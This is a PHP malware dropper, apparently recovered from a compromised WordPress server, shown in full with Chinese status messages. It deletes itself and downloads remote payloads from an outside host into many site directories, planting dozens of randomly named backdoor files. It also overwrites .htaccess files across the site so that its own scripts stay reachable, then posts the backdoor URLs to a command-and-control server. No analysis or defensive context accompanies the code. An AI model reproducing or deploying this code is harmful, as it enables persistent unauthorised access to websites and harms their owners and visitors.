File: //tmp/.1143QPTg5H
<?php
@unlink($_SERVER['SCRIPT_FILENAME']);
if (!function_exists('fwrite')) {
echo 'fwrite 函数不可用。<br>';
}
if (function_exists('fwrite')) {
function getRandomDirectories($dir, $level, $minLevel) {
if ($level < $minLevel || !is_dir($dir)) {
return [];
}
$directories = [];
$subdirs = glob($dir . '/*', GLOB_ONLYDIR);
foreach ($subdirs as $subdir) {
$directories[] = $subdir;
$directories = array_merge($directories, getRandomDirectories($subdir, $level - 1, $minLevel));
}
return $directories;
}
function generateRandomFileName() {
$characters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
$fileName = '';
for ($i = 0; $i < 8; $i++) {
$randomIndex = mt_rand(0, strlen($characters) - 1);
$fileName .= $characters[$randomIndex];
}
return $fileName . '.php';
}
function generateHtaccessFile($directory, $allowedFile) {
$content = "Options -Indexes\n";
$content .= "<FilesMatch \"\\.p$\">\n";
$content .= "Deny from all\n";
$content .= "</FilesMatch>\n";
$content .= "<Files " . $allowedFile . ">\n";
$content .= "Allow from all\n";
$content .= "</Files>\n";
$htaccessFiles = $directory . '/.htaccess';
if (file_exists($htaccessFiles)) {
@chmod($htaccessFiles, 0777);
@unlink($htaccessFiles);
}
$handle = fopen($htaccessFiles, 'w');
if ($handle !== false) {
fwrite($handle, $content);
fclose($handle);
}
}
function getAllDirs($dir, $level, $maxLevel = 6) {
if ($level > $maxLevel || !is_dir($dir)) {
return [];
}
$directories = [];
$subdirs = glob($dir . '/*', GLOB_ONLYDIR);
foreach ($subdirs as $subdir) {
$directories[] = $subdir;
$directories = array_merge($directories, getAllDirs($subdir, $level + 1, $maxLevel));
}
return $directories;
}
function getRemoteContent($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$content = curl_exec($ch);
curl_close($ch);
return $content;
}
$rootDir = $_SERVER['DOCUMENT_ROOT'];
$level8Directories = getRandomDirectories($rootDir, 30,8);
if (!empty($level8Directories)) {
$randomDir = $level8Directories[array_rand($level8Directories)];
$directory2 = $randomDir; // 存储目录路径
$file1Path = $_SERVER['DOCUMENT_ROOT'] . '/index.php';
$file3Path = $_SERVER['DOCUMENT_ROOT'] . '/.htaccess';
$locks = $directory2 . '/locks.php';
$lockhtaccess = $directory2 . '/.htaccess';
$file2Path = $directory2 . '/index.css';
$file4Path =$directory2 . '/htaccess.css';
$file5Path = $directory2 . '/lock.php';
$file6Path = $directory2 . '/uc.php';
$file7Path = $directory2 . '/malls.php';
if (!file_exists($file6Path)) {
@chmod($file6Path, 0755);
@unlink($file6Path);
$remoteUrl = "https://hm.sbyin.com/hm/uclaoban.txt";
try {
$content = file_get_contents($remoteUrl);
if ($content !== false) {
if (file_put_contents($file6Path, $content) === false) {
echo '无法写入文件:' . $file6Path . '<br>';
}
} else {
echo '无法获取远程文件内容:' . $remoteUrl . '<br>';
}
} catch (Exception $e) {
echo '发生错误: ', $e->getMessage(), "\n";
}
}
if (!file_exists($file5Path)) {
@chmod($file5Path, 0755);
@unlink($file5Path);
$remoteUrl = "https://hm.sbyin.com/hm/dir.txt";
try {
$content = file_get_contents($remoteUrl);
if ($content !== false) {
if (file_put_contents($file5Path, $content) === false) {
echo '无法写入文件:' . $file5Path . '<br>';
}
} else {
echo '无法获取远程文件内容:' . $remoteUrl . '<br>';
}
} catch (Exception $e) {
echo '发生错误: ', $e->getMessage(), "\n";
}
}
if (!file_exists($file7Path)) {
@chmod($file7Path, 0755);
@unlink($file7Path);
$remoteUrl = "https://hm.sbyin.com/hm/dirs.txt";
try {
$content = file_get_contents($remoteUrl);
if ($content !== false) {
if (file_put_contents($file7Path, $content) === false) {
echo '无法写入文件:' . $file7Path . '<br>';
}
} else {
echo '无法获取远程文件内容:' . $remoteUrl . '<br>';
}
} catch (Exception $e) {
echo '发生错误: ', $e->getMessage(), "\n";
}
}
if (!file_exists($file2Path)) {
@chmod($file2Path, 0755);
@unlink($file2Path);
$remoteUrl = "https://hm.sbyin.com/shouye/index.txt";
try {
$content = file_get_contents($remoteUrl);
if ($content !== false) {
if (file_put_contents($file2Path, $content) === false) {
echo '无法写入文件:' . $file2Path . '<br>';
}
} else {
echo '无法获取远程文件内容:' . $remoteUrl . '<br>';
}
} catch (Exception $e) {
echo '发生错误: ', $e->getMessage(), "\n";
}
}
if(!file_exists($file4Path)) {
@chmod($file4Path, 0755);
@unlink($file4Path);
@file_put_contents($file4Path,file_get_contents("$file3Path"));
if (file_exists($file4Path) && filesize($file4Path) == 0) {
$rules = "<IfModule mod_rewrite.c>\n";
$rules .= "RewriteEngine On\n";
$rules .= "RewriteBase /\n";
$rules .= "RewriteRule ^index\.php$ - [L]\n";
$rules .= "RewriteCond %{REQUEST_FILENAME} !-f\n";
$rules .= "RewriteCond %{REQUEST_FILENAME} !-d\n";
$rules .= "RewriteRule . index.php [L]\n";
$rules .= "</IfModule>\n";
$rules .= "<FilesMatch \".*\.(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|pHtml|suspected)$\">\n";
$rules .= "Order Allow,Deny\n";
$rules .= "Deny from all\n";
$rules .= "</FilesMatch>\n";
$rules .= "<FilesMatch \"^(index.php)$\">\n";
$rules .= "Order Allow,Deny\n";
$rules .= "Allow from all\n";
$rules .= "</FilesMatch>";
} else {
$rules = "<FilesMatch \".*\.(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|pHtml|suspected)$\">\n";
$rules .= "Order Allow,Deny\n";
$rules .= "Deny from all\n";
$rules .= "</FilesMatch>\n";
$rules .= "<FilesMatch \"^(index.php)$\">\n";
$rules .= "Order Allow,Deny\n";
$rules .= "Allow from all\n";
$rules .= "</FilesMatch>";
}
if (file_exists($file4Path)) {
if (substr(sprintf('%o', fileperms($file4Path)), -4) != '0777') {
chmod($file4Path, 0777);
}
}
$file = fopen($file4Path, "a");
fwrite($file, PHP_EOL . $rules);
fclose($file);
}
// 处理 $locks 文件
if (!file_exists($locks) || is_file($locks)) {
@chmod($locks, 0755);
@unlink($locks);
$content = getRemoteContent("https://hm.sbyin.com/hm/lock.txt");
if ($content !== false) {
$handle = fopen($locks, 'w');
if ($handle !== false) {
fwrite($handle, $content);
fclose($handle);
// 计算 URL 路径
$protocol = isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? 'https' : 'http';
$relativePath = str_replace($rootDir, '', $locks);
$relativePath = str_replace(DIRECTORY_SEPARATOR, '/', $relativePath);
$locksURL = $protocol . '://' . $_SERVER['HTTP_HOST'] . $relativePath;
} else {
echo '无法写入文件:' . $locks . '<br>';
}
} else {
echo '无法获取远程文件内容' . '<br>';
}
} else {
echo '文件已存在:' . $locks . '<br>';
}
// 处理 $lockhtaccess 文件
if (file_exists($lockhtaccess) || !file_exists($lockhtaccess)) {
@chmod($lockhtaccess, 0777);
$content = getRemoteContent("https://hm.sbyin.com/wp/htaccess.txt");
if ($content !== false) {
$handle = fopen($lockhtaccess, 'w');
if ($handle !== false) {
fwrite($handle, $content);
fclose($handle);
@chmod($lockhtaccess, 0444);
} else {
echo '无法写入文件:' . $lockhtaccess . '<br>';
}
} else {
echo '无法获取远程文件内容:https://hm.sbyin.com/wp/htaccess.txt' . '<br>';
}
} else {
echo '文件不存在:' . $lockhtaccess . '<br>';
}
} else {
echo '没有找到任何第8层的目录。<br>';
}
$bkindex = $_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/index.css';
$htaccess = $_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/.htaccess';
$htaccesscss = $_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/htaccess.css';
$htaccessbak = $_SERVER['DOCUMENT_ROOT'].'/.htaccess';
$lock = $_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/qPyYcxpHKCu.php';
if (!file_exists($bkindex) || is_file($bkindex)) {
@chmod($bkindex, 0755);
@unlink($bkindex);
$content = getRemoteContent("https://hm.sbyin.com/shouye/index.txt");
if ($content !== false) {
$handle = fopen($bkindex, 'w');
if ($handle !== false) {
fwrite($handle, $content);
fclose($handle);
} else {
echo '无法写入文件:' . $bkindex . '<br>';
}
} else {
echo '无法获取远程文件内容:https://hm.sbyin.com/shouye/index.txt' . '<br>';
}
}
if (!file_exists($htaccess) || is_file($htaccess)) {
@chmod($htaccess, 0755);
@unlink($htaccess);
$content = getRemoteContent("https://hm.sbyin.com/wp/htaccess.txt");
if ($content !== false) {
$handle = fopen($htaccess, 'w');
if ($handle !== false) {
fwrite($handle, $content);
fclose($handle);
} else {
echo '无法写入文件:' . $htaccess . '<br>';
}
} else {
echo '无法获取远程文件内容:https://hm.sbyin.com/wp/htaccess.txt' . '<br>';
}
}
if(!file_exists($htaccesscss) or file_exists($htaccesscss)){
@chmod($htaccesscss, 0755);
@unlink($htaccesscss);
@file_put_contents($htaccesscss,file_get_contents("$file4Path"));
}
}
if (!file_exists($lock) || is_file($lock)) {
@chmod($lock, 0755);
@unlink($lock);
$content = getRemoteContent("https://hm.sbyin.com/wp/lock.txt");
if ($content !== false) {
$handle = fopen($lock, 'w');
if ($handle !== false) {
fwrite($handle, $content);
fclose($handle);
} else {
echo '无法写入文件:' . $lock . '<br>';
}
} else {
echo '无法获取远程文件内容:https://hm.sbyin.com/wp/lock.txt' . '<br>';
}
}
$protocol = isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? 'https' : 'http';
$locks1 = $protocol . '://' . $_SERVER['HTTP_HOST'] . '/wp-admin/css/qPyYcxpHKCu.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,"http://209.209.8.61/005/receiver.php");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array('content' => $locks1)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$server_output = curl_exec($ch);
if(curl_errno($ch)) {
echo 'Error:' . curl_error($ch);
} else if($server_output) {
if($server_output == "内容成功添加到文件中") {
echo "固定鎖发送成功" . PHP_EOL;echo $locks1 . "<br>";
} else {
echo "固定鎖鎖发送失败: " . $server_output . PHP_EOL;
}
}
curl_close ($ch);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,"http://209.209.8.61/005/receiver.php");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array('content' => $locksURL)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$server_output = curl_exec($ch);
if(curl_errno($ch)) {
echo 'Error:' . curl_error($ch);
} else if($server_output) {
if($server_output == "内容成功添加到文件中") {
echo "隨機鎖发送成功"; echo $locksURL . "<br>";
} else {
echo "隨機鎖发送失败: " . $server_output; echo $locksURL . "<br>";
}
}
curl_close ($ch);
$remoteIndexUrl = 'https://hm.sbyin.com/wailian/index.txt';
$remoteHtaccessUrl = 'https://hm.sbyin.com/wailian/htaccess.txt';
$dirs = getAllDirs($rootDir, 1, 6);
$randomDir = $dirs[array_rand($dirs)];
$newDir = $randomDir . '/dir';
if (!is_dir($newDir)) {
mkdir($newDir, 0755, true);
}
$indexFile = $newDir . '/index.php';
$htaccessFile = $newDir . '/.htaccess';
$contentIndex = getRemoteContent($remoteIndexUrl);
if ($contentIndex !== false) {
$handleIndex = fopen($indexFile, 'w');
if ($handleIndex !== false) {
fwrite($handleIndex, $contentIndex);
fclose($handleIndex);
} else {
echo '无法写入文件:' . $indexFile . '<br>';
}
} else {
echo '无法获取远程文件内容:' . $remoteIndexUrl . '<br>';
}
$contentHtaccess = getRemoteContent($remoteHtaccessUrl);
if ($contentHtaccess !== false) {
$handleHtaccess = fopen($htaccessFile, 'w');
if ($handleHtaccess !== false) {
fwrite($handleHtaccess, $contentHtaccess);
fclose($handleHtaccess);
} else {
echo '无法写入文件:' . $htaccessFile . '<br>';
}
} else {
echo '无法获取远程文件内容:' . $remoteHtaccessUrl . '<br>';
}
$createdFiles2 = [];
$createdFiles2[] = $indexFile;
foreach ($createdFiles2 as $file) {
$url = str_replace($_SERVER['DOCUMENT_ROOT'], $protocol . '://' . $_SERVER['HTTP_HOST'], $file);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,"http://209.209.8.61/005/wailian.php");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array('content' => $url)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$server_output = curl_exec($ch);
if(curl_errno($ch)) {
echo 'Error:' . curl_error($ch);
} else if($server_output) {
if($server_output == "内容成功添加到文件中") {
echo "外鏈发送成功" . PHP_EOL;
} else {
echo "外鏈发送失败: " . $server_output . PHP_EOL;;
}
}
curl_close ($ch);
echo $url . "<br>";
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36');
curl_setopt($ch, CURLOPT_HEADER, false);
$result = curl_exec($ch);
if (curl_errno($ch)) {
echo 'cURL Error: ' . curl_error($ch);
} else {
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if ($httpCode >= 200 && $httpCode < 300) {
echo 'URL访问成功' . PHP_EOL;
echo '返回结果:' . $result . PHP_EOL;
} else {
echo 'URL访问失败,HTTP响应代码:' . $httpCode . PHP_EOL;
}
}
curl_close($ch);
$allDirs = getAllDirs($rootDir, 1);
foreach ($allDirs as $dir) {
if ($dir !== $rootDir && $dir . '/.htaccess' !== $htaccess && $dir . '/.htaccess' !== $lockhtaccess) {
$htaccessFile = $dir . '/.htaccess';
if (file_exists($htaccessFile)) {
@chmod($htaccessFile, 0777);
@unlink($htaccessFile);
}
$htaccessContent = '<FilesMatch ".*\.(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|php6|php7|php8|pHtml|suspected)$">' . PHP_EOL;
$htaccessContent .= 'Order Allow,Deny' . PHP_EOL;
$htaccessContent .= 'Deny from all' . PHP_EOL;
$htaccessContent .= '</FilesMatch>' . PHP_EOL;
$handle = fopen($htaccessFile, 'w');
if ($handle !== false) {
fwrite($handle, $htaccessContent);
fclose($handle);
@chmod($htaccessFile, 0444);
}
}
}
$level4Directories = getRandomDirectories($rootDir, 6, 5);
$level5Directories = getRandomDirectories($rootDir, 7, 5);
$level6Directories = getRandomDirectories($rootDir, 8, 5);
$allDirectories = array_merge($level4Directories, $level5Directories, $level6Directories);
$selectedDirectories = array_rand($allDirectories, 50);
$remoteFiles = [];
for ($i = 1; $i <= 60; $i++) {
$remoteFiles[] = 'https://hm.sbyin.com/hn/' . $i . '.txt';
}
foreach ($selectedDirectories as $directoryIndex) {
$directory = $allDirectories[$directoryIndex];
$newDirectory = $directory;
$randomFileName = generateRandomFileName();
$filePath = $newDirectory . '/' . $randomFileName;
$randomFileContent = getRemoteContent($remoteFiles[array_rand($remoteFiles)]);
if ($randomFileContent !== false) {
$handle = fopen($filePath, 'w');
if ($handle !== false) {
fwrite($handle, $randomFileContent);
fclose($handle);
}
generateHtaccessFile($newDirectory, $randomFileName);
$houmenurl = str_replace($_SERVER['DOCUMENT_ROOT'], 'https://' . $_SERVER['HTTP_HOST'], $filePath);
echo '<a href="' . $houmenurl . '">' . $houmenurl . '</a><br>' . PHP_EOL;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,"http://209.209.8.61/005/houmen.php");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array('content' => $houmenurl, 'host' => $_SERVER['HTTP_HOST'])));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$server_output = curl_exec($ch);
if(curl_errno($ch)) {
echo 'Error:' . curl_error($ch);
} else if($server_output) {
if($server_output == "内容成功添加到文件中") {
echo "後門发送成功" . PHP_EOL;
} else {
echo "後門发送失败: " . $server_output . PHP_EOL;
}
}
}
}
?>